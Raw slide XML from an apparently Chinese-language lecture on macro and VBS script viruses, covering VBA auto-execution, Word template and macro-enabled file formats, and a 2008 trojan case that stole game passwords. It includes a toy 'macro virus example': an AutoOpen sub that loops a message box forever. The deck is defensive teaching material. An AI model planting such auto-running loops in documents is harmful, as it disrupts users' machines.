          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>宏语言即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VISUAL    BASIC    FOR APPLICATION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，简称 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问许多操作系统函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>并支持文档打开时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自动执行宏</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>         ——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这使得用这种语言写计算机病毒成为可能</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C62D5CBB-6F12-4E51-BD2A-C30BF2E5B6A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>宏病毒示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52227" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8914F63B-D77C-45C0-A454-31C6D0F501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2205038"/>
            <a:ext cx="77978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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A11D9519-9047-420C-9CE6-023AD95B4B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403350" y="188913"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>宏病毒示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F26556-2998-409D-8FF2-EA2704CF7C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="1773238"/>
            <a:ext cx="8027987" cy="4389437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0"/>
              <a:t>Sub AutoOpen()    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’定义函数名，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AutoXXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为自动宏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0"/>
              <a:t>While True              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’恶意代码 ，死循环</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1"/>
              <a:t>Msgbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0"/>
              <a:t> ”Hello   world”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’调用对话框显示消息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0"/>
              <a:t>Wend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0"/>
              <a:t>End Sub                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’函数到此结束</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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="245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579">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24579">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2457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579">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24579">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579">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2457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DC652BBF-4A48-42C7-BCC5-EF1896C02962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331913" y="371475"/>
            <a:ext cx="7812087" cy="3048000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>一、模板文件格式：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>.dot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>文档：模板文档，新文档继承模板的属性（ 宏、菜单、格式等）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Normal.dot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>文件：全局模板，在建立整个文档中所起的作用是作为一个基类，是新建文档默认的模板。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FDEA4E2-99A1-4A6F-BF13-5BC06F98802C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331913" y="3309938"/>
            <a:ext cx="8229600" cy="3662362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>二、数据文件格式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.doc———</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一种可以存贮宏的普通文档；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>一种不包含宏的普通文档；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一种包含宏或启用了宏的文档；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>dotx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>一种不包含宏的模板；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dotm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一种包含宏或启用了宏的模板。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRP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614764C4-D261-4B47-8658-58986FED651F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>江苏“温柔”木马案</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75A6AAA-7C4B-4378-9530-8CBD9AE14085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1647825"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>日，省公安厅互联网违法犯罪举报中心接到一网民举报，“徐州购物网有病毒，很严重。”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t> 分析的结果让民警大吃一惊，网站服务器被安装了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>款可疑程序，其中有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>款是当时在互联网上非常流行的“温柔”系列木马程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>而中了这些木马程序的网络用户一旦登录自己的网上游戏账号，游戏账号以及密码就会被立即发送到木马所指定的一些邮箱内。</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25D9760A-0F48-4F6D-AF0F-54D03FA6D1AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>脚本病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF174EE4-558D-46A8-80FB-31313AFFA27B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>VBScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>编写，能够进行自我传播的破坏性程序，其需要人工干预触发执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>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38A4E9F-8A28-4F8F-896B-6BF749D36FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="333375"/>
            <a:ext cx="8001000" cy="1216025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>脚本语言</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2909E75D-F6AD-4EF6-AF09-C50D9C526057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2060575"/>
